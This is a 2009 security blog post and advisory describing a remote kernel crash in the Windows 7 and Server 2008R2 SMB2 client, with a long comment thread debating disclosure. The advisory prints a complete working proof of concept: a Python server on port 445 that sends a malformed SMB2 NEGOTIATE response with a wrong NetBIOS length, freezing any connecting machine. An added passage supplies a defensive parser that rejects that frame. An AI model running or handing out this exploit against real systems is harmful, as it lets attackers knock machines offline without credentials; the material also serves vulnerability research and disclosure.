Wednesday, November 11, 2009

Windows 7 / Server 2008R2 Remote Kernel Crash

This bug is real proof that the SDL failed.
The bug triggers an infinite loop in SMB{1,2}, pre-auth, no credentials needed...
It can be triggered from outside the LAN via (IE*).
The bug is so basic that it should have been spotted two years ago by the SDL, if the SDL had ever existed:

netbios_header = struct.pack(">i", len(SMB_packet))  # 4 bytes: 0x00 type byte + 24-bit big-endian length
frame = netbios_header + SMB_packet
(The NetBIOS session header carries the length of the SMB{1,2} packet that follows it.)

If the length in the NetBIOS header is 4 bytes (or more) smaller than the SMB packet that actually follows, the client just blows up!
WHAT?? You gotta be kidding me, where's my SDL?!?
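As an added example (not part of the original post, and not the author's PoC), the following Python 3 script builds the NetBIOS framing described above and shows the consistency check a receiving SMB2 client should perform before trusting anything inside the message. The byte string is the SMB2 NEGOTIATE response carried by the PoC in section IV with its NetBIOS header stripped; the field offsets are those of the SMB2 header and NEGOTIATE response layouts; the function names and the ValueError messages are mine. It goes beyond the single 4-byte case on this page by shifting the declared length by several deltas in both directions and showing that every one of them is rejected.

```python
import struct

# The 158-byte SMB2 NEGOTIATE response carried by the PoC in section IV, without
# its 4-byte NetBIOS session header: 64-byte SMB2 header, 65-byte NEGOTIATE
# response structure (whose last byte starts the variable buffer), and a 30-byte
# SPNEGO blob at offset 128. Copied from the page's own packet.
SMB2_NEGOTIATE_RESPONSE = bytes.fromhex(
    "fe534d42400000000000000000000100"  # \xFESMB, StructureSize 64, Command 0 (NEGOTIATE), Credit 1
    "01000000000000000000000000000000"  # Flags 0x1 = SERVER_TO_REDIR, NextCommand 0, MessageId 0
    "00000000000000000000000000000000"  # Reserved, TreeId, SessionId
    "00000000000000000000000000000000"  # Signature (unsigned)
    "41000100020200003082a411e3122341"  # StructureSize 65, SecurityMode, Dialect 0x0202, ServerGuid...
    "aa4bad99fd52318d0100000000000100"  # ...ServerGuid, Capabilities, MaxTransactSize
    "0000010000000100cf7367746260ca01"  # MaxReadSize, MaxWriteSize, SystemTime
    "cb51e0196260ca0180001e00204c4d20"  # ServerStartTime, SecurityBufferOffset 128, Length 30, Reserved2
    "601c06062b0601050502a0123010a00e"  # SPNEGO NegTokenInit (30 bytes)...
    "300c060a2b06010401823702020a"
)

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
NEGOTIATE_RESPONSE_STRUCTURE_SIZE = 65  # 64 fixed bytes + 1 byte of Buffer
NEGOTIATE_RESPONSE_FIXED_LEN = 64


def frame_netbios(smb_message: bytes) -> bytes:
    """Prepend the NetBIOS session header: one zero type byte + 24-bit big-endian length."""
    if len(smb_message) > 0xFFFFFF:
        raise ValueError("SMB message too large for a NetBIOS session header")
    return struct.pack(">I", len(smb_message)) + smb_message


def mutate_length(frame: bytes, delta: int) -> bytes:
    """Copy of a framed message whose declared length is off by `delta` (the PoC uses -4)."""
    declared = struct.unpack(">I", frame[:4])[0] & 0xFFFFFF
    return struct.pack(">I", declared + delta) + frame[4:]


def parse_negotiate_response(frame: bytes) -> dict:
    """Consume one framed SMB2 NEGOTIATE response the way a careful client should.

    Every length and offset the peer declares is checked against the bytes that
    are actually present before it is used; any inconsistency raises ValueError
    instead of being trusted.
    """
    if len(frame) < 4:
        raise ValueError("truncated NetBIOS session header")
    if frame[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    declared = struct.unpack(">I", frame[:4])[0] & 0xFFFFFF
    body = frame[4:4 + declared]  # a stream reader would read exactly `declared` bytes
    if len(body) != declared:
        raise ValueError("NetBIOS header declares %d bytes, only %d present" % (declared, len(body)))
    # the smallest legal NEGOTIATE response is the SMB2 header plus the fixed response fields
    if declared < SMB2_HEADER_LEN + NEGOTIATE_RESPONSE_FIXED_LEN:
        raise ValueError("message too short for a NEGOTIATE response")
    if body[:4] != SMB2_MAGIC:
        raise ValueError("bad SMB2 protocol id")
    hdr_size, = struct.unpack_from("<H", body, 4)
    command, = struct.unpack_from("<H", body, 12)
    flags, = struct.unpack_from("<I", body, 16)
    if hdr_size != SMB2_HEADER_LEN or command != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE message")
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a response")
    resp = body[SMB2_HEADER_LEN:]
    struct_size, _sec_mode, dialect = struct.unpack_from("<HHH", resp, 0)
    if struct_size != NEGOTIATE_RESPONSE_STRUCTURE_SIZE:
        raise ValueError("bad NEGOTIATE response StructureSize %d" % struct_size)
    sec_off, sec_len = struct.unpack_from("<HH", resp, 56)
    # offsets are relative to the SMB2 header; the blob must lie inside the declared message
    if sec_off < SMB2_HEADER_LEN + NEGOTIATE_RESPONSE_FIXED_LEN or sec_off + sec_len > declared:
        raise ValueError("security buffer [%d, %d) outside declared message of %d bytes"
                         % (sec_off, sec_off + sec_len, declared))
    return {
        "dialect": dialect,
        "security_blob": body[sec_off:sec_off + sec_len],
        "consumed": 4 + declared,  # where the next framed message would start
    }


def is_well_formed(frame: bytes) -> bool:
    """True if the framed NEGOTIATE response passes every consistency check."""
    try:
        parse_negotiate_response(frame)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    good = frame_netbios(SMB2_NEGOTIATE_RESPONSE)
    poc = mutate_length(good, -4)  # exactly the 0x9a-vs-0x9e frame the PoC sends
    print("well-formed frame accepted:", is_well_formed(good))
    print("PoC frame accepted:", is_well_formed(poc))
    for delta in (-8, -4, -1, 1, 8):
        verdict = "rejected" if not is_well_formed(mutate_length(good, delta)) else "ACCEPTED"
        print("declared length off by %+d -> %s" % (delta, verdict))
```

Run it directly to see the correctly framed response accepted and every shifted length rejected. In a TCP stream the NetBIOS length is the only thing that delimits a message, so a parser has two sources of truth: the outer length and the offsets inside the SMB2 payload. A receiver that follows one without cross-checking it against the other ends up reading past the end of the message it was handed; one that checks SecurityBufferOffset + SecurityBufferLength against the declared length refuses the PoC frame before it ever touches the blob.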

"Most secure OS ever";
Whatever your firewall is set to, you can get remotely smashed via IE, or even via some broadcast NBNS tricks (no user interaction).


Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7*, Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
..

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific to Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Triggers a remote kernel crash on Win7 and Server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast, from the target: \\this_script_ip_addr\BLAH , instant crash
#Author: Laurent Gaffié
#

import SocketServer  # Python 2; answers every incoming SMB2 connection with one malformed response

# Malformed SMB2 NEGOTIATE response. The 4-byte NetBIOS session header declares
# a length of 0x9a (154) bytes, but the SMB2 message that follows is 0x9e (158)
# bytes long; the Win7/2008R2 client loops forever on that mismatch.
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
          "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
          "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
          "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
          "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
          "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
          "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
          "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        print "Who:", self.client_address
        print "THANKS SDL"
        # read whatever the client sends first (its NEGOTIATE request is not parsed),
        # answer with the malformed response, then drop the connection
        negotiate_request = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()


launch = SocketServer.TCPServer(('', 445), SMB2)  # listen on all interfaces, port 445 (needs root/admin)
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Windows 7/Server 2008R2 machine
on a LAN or via IE

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windows Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment; your vendor does not care.
Disable the SMB feature and close its ports until a real audit is done.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledges the vuln
November 11th, 2009: MSRC tries to convince me that a multi-vendor IPv6 bug shouldn't appear in a security bulletin.
November 11th, 2009: This bug released.

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

82 comments:

corelanc0d3r said...

awesome, well done !

Trancer said...

Nice one. You're really getting down on the MS SDL team...

Have you debugged this vulnerability? The crash is a result of what..? Overflow? Pointer dereference?

Trancer said...

Aaaahhh ok, I didn't see this - Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop. NO BSOD, YOU GOTTA PULL THE PLUG.

Anonymous said...

awesome job Laurent !!!
SDL sucks, as ever!

Marco Ramilli said...

This is, really, unbelievable. The most secure OS ever... crashes through a trivial infinite loop (moreover caused by a remote packet)? That's amazing! Good job man!
My question: what was the bell that suggested you investigate in this direction? Why SMB? It's old and, theoretically, assumed "safe".
Again, good job!

Anonymous said...

This is a real fucking nice shit. Good job. :)

SDL said...

You can simplify your POC and make it:
packet = "\x00\x00\x00\x9a"

The other lines are not being concatenated to the packet, so they are a no-op, and you only need to send 4 bytes to trigger this issue.

Anonymous said...

Actually, the other lines are being concatenated. This is a feature of Python to allow multiple line strings.

Anonymous said...

pathetic.

Anonymous said...

Nicely done. Tested it out on Win7 and Server 2008 R2 successfully.

http://praetorianprefect.com/archives/2009/11/how-to-crash-windows-7-and-server-2008/

Benjamin Flesch said...

Awesome,

this vulnerability shouldn't have existed in the first place.. :-)

Black said...

Mr. Gaffié! Good work. Keep up the same! We tried it in our labs and it works indeed!
Guess it is time for a Service Pack already! :P

Anonymous said...

NBNS exploit is fail if true. Good job!

Juji.PL said...

The netbios protocol is optional. Newer versions of Windows may share resources without it. (And this is a better option.)

Anonymous said...

Was anyone able to repro with SMBv1?

# root cd said...

Haha, you rock Laurent!

Anonymous said...

What's the point of revealing the flaw without giving MS time to react?
To show off, maybe?

Anonymous said...

Internet vandalism.. very bad decision to make this public like this.
Only three days after the discovery..

Anonymous said...

Why not just tell M$ about it instead of publishing it?
Kinda stupid ...

Anonymous said...

Well no, you big idiot, he did notify them.

feniix said...

Hello Laurent, I tried it with no luck.

Is there anything special that needs to be enabled on the windows 7/2k8r2 machine?

Anonymous said...

He notified them 2 days ago, you wimp (easy to be aggressive...)

Anonymous said...

How do you exploit it? Tutorial?

Algorn said...

As some people said,

Too bad someone published something only 3 days after discovering it.
Why don't you share it with MS only ? Maybe asking for money ?
This post is interesting but useless if you didn't share your discovery with MS.
I'm sorry but I don't like the "Hello! I'm here to destroy MS and everything else!" kind of guy.

Laurent Gaffié blog said...

That's the cost of security by obscurity and propaganda.
Like it or not, it's like that.

Anonymous said...

awesome, well done !

Super work good job.

Anonymous said...

You're right Laurent,the SDL should have seen this bug at the very first fuzzing sessions.
Keep it up, the industry needs people like you, your work is awesome.

Anonymous said...

You're the best, Lolo, you just lost $300,000, the sum you would have earned if you'd communicated your flaw "intelligently"!
You're really the best, keep pissing out code, you'll go far!

Anonymous said...

The Internet Storm Center http://isc.sans.org/diary.html?storyid=7573 said you left out one line of code and there was also some formatting issues. The speculation was that this was intentional on your part "to give Microsoft a chance to get a fix in..."

Is that true? Are you trying to go easy on MS or what?

Anonymous said...

What's wrong with Microsoft and their apparent lack of any security whatsoever? This exploit couldn't possibly have made it past any fuzzer or attempt at auditing the code. They still just throw code together and ship it the instant it compiles, bugs be damned.

SDL is a joke, a PR stunt at best. Probably just one bloke writing a blog and not something ever used inside Microsoft.

Responsible disclosure is something that only works if there are responsible vendors. As long as MS and others treat security as a PR issue, it's much better to do as Laurent did and let people know about the issues fast so they can take their own actions to mitigate problems / change vendor.

Anonymous said...

@last anonymous
well said man.
@laurent
keep up the good work.

Anonymous said...

Great work done buddy..!!!!

Anonymous said...

Ain't it possible to actually use the "auto discovery" feature of the "network neighborhood" to just crash the system w/o user input?

Aaron G said...

Excellent work Laurent. How long did it take to find this one? Fuck the non-disclosure or the "give micro$oft their time to fix it" people. They had their time.. they had PLENTY of time to fuzz the shit out of their code. How long did vista take? How many people work at micro$oft? God damn bluehat people have probably been saying this for years yet... seems like they're skipping that step of the SDL. Maybe releasing things full disclosure will make them change their ways (more than they already have) although that didn't work in the past. Fuck'em.

Adonaki said...

Why do you need to be so cocky about your finding? Got your job application at Redmond rejected?

Anonymous said...

Sorry, but you are just a pathetic MS hater. Do you think it is wise to publish details 3 days after contacting MS?

And don't worry, more bugs are gonna be found, same as in any other OS; hopefully they'll be found by adult people.

Anonymous said...

How dare Microsoft or anyone else attack Mr. Gaffie or call him irresponsible over the release of this vulnerability/poc. It is not my job nor Mr. Gaffie's to provide free consulting services to Microsoft in order to fix or improve their shitty products.

Maybe one day Microsoft will get it through their thick heads that compensation AND public recognition will slow the release of PoC source. From my understanding, they offer no compensation, no public recognition, no gifts (software/MSDN subscriptions).... NOTHING....

But, they expect all developers to volunteer their time, knowledge, and expertise for nothing.

F*ck them and the horse they rode in on...

But then again, these are just the opinions of one individual....

Anonymous said...

So pathetic. If people spent as much time looking for flaws in the Linux kernel or on MacOS, we'd have stuff like this every day. Change targets for a bit, it's getting old to always focus on Microsoft...

Anonymous said...

At least i know what to do, turn off SMB, and don't trust what MS says.
Thanks Laurent.

Anonymous said...

Good job ;-)Thanks man

Anonymous said...

Please host a test site for this!!! OR i can host it give me the "plug and play code"

sdhushd said...

If SDL fails, then why do products like Internet Explorer, SQL Server, Windows Media and Silverlight have much fewer (4 times less) critical flaws discovered each year than Firefox, Oracle, Quick Time and Adobe Flash Player?

that must mean that products like Firefox, Oracle, Quick Time, Flash player are just plain FAILures themselves, coded in a crappy way!

Anyway, you don't seem to understand what SDL is.
If you believe that any development process could be able to lead to a flawless software, then you have no clue about what you're talking about.

You must think that Linux is a huge failure too, since the typical Linux distribution has many more flaws than any Windows version (even those developed without SDL).

Laurent Gaffié blog said...

No, I don't believe in flawless software, but I do believe in hardened SMB/IP/RPC/NTB, and in fuzzing, which
allows you to spot these kinds of vulnerabilities very fast.
I don't believe in security by obscurity, which leads to this kind of dummy flaw.
You talk about Linux; they don't have these kinds of no-user-interaction remote kernel panics.

What I'm trying to point out here is about 2 things:

They said new code goes through stress testing, fuzzing, constant review, bla.
It's false, and this bug proves it; it's brand new code.

The other thing is they concentrate way too much on IE and the Office suite, while SMB, IPv6, etc. don't need any user
interaction, and are critical as they run with kernel privilege.

sad-wind said...

Why does Linux have so many SMB and kernel vulnerabilities?

Anonymous said...

"You talk about linux; they dont have theses kind of no user interaction remote kernel panic."

Really? Just first hit on Google.
http://www.builderau.com.au/news/soa/Linux-kernel-flaw-allows-DoS-attack/0,339028227,339131700,00.htm

And of course there are many more.

Anonymous said...

Remote crash over the LAN... That's just pathetic and pointless. First contact with MS November 8th and P.O.C. released the 11th? Very responsible, congrats.

For those of you guys pleased with this crap, you are also pathetic.

One more time, this "crash" is undoable over the WAN. No remote code execution. WTF?

All that crap to create the buzz? Fact is you bring nothing to the community.

Anonymous said...

The point of responsible disclosure is NOT to protect MS...it's to protect the businesses that depend on MS. Yes, MS missed something huge here, but that's no reason to put this out there for the world to have 3 days in. MS isn't who will be attacked, it's other businesses that may or may not be able to control this that will pay the price. Good work, but irresponsible thought process here.

Anonymous said...

blogspot = free mister, calling Microsoft you might end up losing like 30 euro before you even come close to the person to speak with. This way you can be sure they will find out, and besides that, it's way better than keeping it underground so that somebody will code a nifty worm which will cause massive amounts of viagra spam in your inbox. Once I tried to report an XSS to Microsoft through the phone and I just gave up (they are still vulnerable to it today); they are like zombies moaning about whether you are a customer. I would nearly say I experienced how it was to be black in the middle of a circle of KKK members (not that any other credit card company would listen better; if you find a security leak on something like HSBC you can better just forget it, they just won't listen to you in any way until you post it on a blog/xssed or any other site to give it some wheels in the media).

Anonymous said...

stop whining it's just a dos and a good way to prove a point.

Anonymous said...

It's a shame nothing was done by the book, except perhaps the "sploit" this gentleman seems so proud to share. One day the community will realise it loses out by wanting to parade its sploits early and giving the industry no chance. But then, alone in his basement, it probably wasn't very profitable for him to have this sploit :)

Anonymous said...

Well, the poor idiot deleted my comment; it's annoying to be told you've been stupid by the people in your own community :) We'll be sure to remember that name, Laurent Gaffié, hahah

Anonymous said...

and he's writing on his own blog as anonymous trying to pass as someone else haha

Anonymous said...

the only point you proved is that you were a selfish idiot not thinking about the consequences of your act

Ron said...

Wow... I'm glad I switched to Linux last year... Windows has been getting crazy.

is this like the old ping of death attack from the windows 98 days?

Laurent Gaffié blog said...

@ last 4 anonymous (same person);
I know very well what to do with a sploit, but I'm not a money whore; I'm not going to sell it to people who could use it against my government.
I don't call that doing "security".
Everyone who is at risk can protect themselves if they are already on Windows 7.

Also I don't need to post as "anonymous"; I stand by what I say, unlike you.

Now if you think the system as it is, with this kind of single-minded thinking, is good, that's your business, and your brown nose; don't go assuming that others must follow you into what is a failure.
I think differently. You talk about "community";
a community that can't accept that people may think differently is not a community, it's a transparent dictatorship.

Anonymous said...

I'm an IT guy and it only made me laugh and cheer a bit. It's a problem that, as he points out, is something that should have been caught by the vendor themselves a long time ago.

Anonymous said...

Good research... There are STILL some problems in netbios though, in older Windows, unreported, so this is no surprise... they have never given a sh*t about users' security. Look, code is out, no patch? Is a 4-byte stack b0f that HARD TO PATCH? Fuck em, I tried reporting to them also, 3 times, and they denied existence! lol... I did also have this with the BSD security team... the top OS, or they think they're tops, do NOT LIKE to admit they did NOT CHECK SRC CODE! Simple as that, this should NEVER have ever gotten into a final or even close!
Great research but, unfortunately, you are only helping fellow people who CARE ABOUT ALL SECURITY, not just one type... but netbios is always and still so piss damn easy to attack, most users still don't use passes... or avoid using them for their own reasons... so I guess this shit will always exist, and I bet there is a cmd exec here ;)
Cheers,
xd

Anonymous said...

"And while this flaw is embarrassing for Microsoft, it's hard to see why anyone would bother to exploit it: It's only a denial of service, meaning that it locks up other computers, and it only works on the LAN, not over the Internet. So it's not good, but it's probably not a big deal. And it's not a "zero-day.""


http://www.pcmag.com/article2/0,2817,2355864,00.asp?kc=PCRSS03069TX1K0001121&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+ziffdavis%2Fpcmag%2Fbreakingnews+%28PCMag.com+Breaking+News%29

Anonymous said...

Why don't they ever magnify issues in Linux or other products like this? SQL Server has had a little more than 10 security fixes (in 5 years!) while Oracle had over 300 in the same timeframe. Firefox accounts for 44% of browser vulnerabilities, ...

Anonymous said...

another m$ comment...

penile said...

Ya linux doesnt have that, but everything else is shit. Well I give you props, you could have let this stay underground but you released it and for that you must be a good guy :p

Subbu said...

I love this :) Great Job. What were MS Engineers doing so far?!!!!!!

Byron said...

Yeh Microsoft sucks but hey, you should be more professional in your report. When you say "your vendor does not care" shows you are not subjective at all. Nice to be always a pro without any exception. Still MS sucks.

Mikko said...

You must be very proud of yourself...not!

Christophe said...

Hi Laurent. Good job! I'm one of those who think you have to hit M$ where it hurts, because they don't care about being ethically correct and couldn't care less about providing good products to their customers. And it's surely one of the rare ways to make that crook M$ see reason.

On the other hand, I'm a bit surprised by your last comment, where I may have misread what I saw: "brown nose" (?). You're addressing an idiot, I understand that, but you seem to be getting carried away... You know about Godwin's law :)

Regards,
--
Christophe

nibu said...

Damn....

Ulterior said...

Very good. Keep destroying Ms

Frank said...

awesome job here!!!

zazie-lavender said...

Nice find. Critical or not, Microsoft needs to refine its exploit reporting channels. Security researchers like him shouldn't have to publicly disclose this sort of stuff to get a patch released. It'd be a simple enough matter for MS to release a workaround patch for this via Windows Update. It'd be easy enough to check the system's settings for active shares, and if none exist, disable SMB until the real patch is released. If shares do exist, it would simply prompt the user after informing them of the risk level.

gorfou said...

nice one !
Thanks Laurent

DK said...

Damn...I didn't hear Laurent ask for anyone's advice on disclosure, his opinion of MSFT, or anything else. Why doesn't everyone who thinks they're better off not knowing about software vulnerabilities go somewhere else and stick your head in the sand?

3 days, a week, a month? Laurent doesn't work for MSFT, he doesn't owe them or you anything. This is the equivalent of noticing your car explodes if you back it into something, disclosing the fact that it happens is reality, the person who tells you before you explode has done you a favor.

LinoX said...

You should first release it to the public and THEN contact MS.

Their way of working is really awful. Our OSes are full of stupid bugs (that remain hidden because of closed source). They don't need to triple-check the code just because every security flaw is first reported and then made public.
Fuck you! YOU MUST CHECK THE CODE I'M RUNNING. I paid for it and I want it to be almost bug-free.. yes.. it is not possible, but such stupid bugs make me think they don't check their code at all.

A 0 day exploit like this can be a pain in terms of image. There should be more.. maybe they'll start doing things as they should!

nels said...

Last but not least ?
Only one failure !!!

thimer said...

Well done man!!! Very good!!!
really good job.

darklord said...

this is a nice post...are there other such vulnerabilities discovered for Win7?
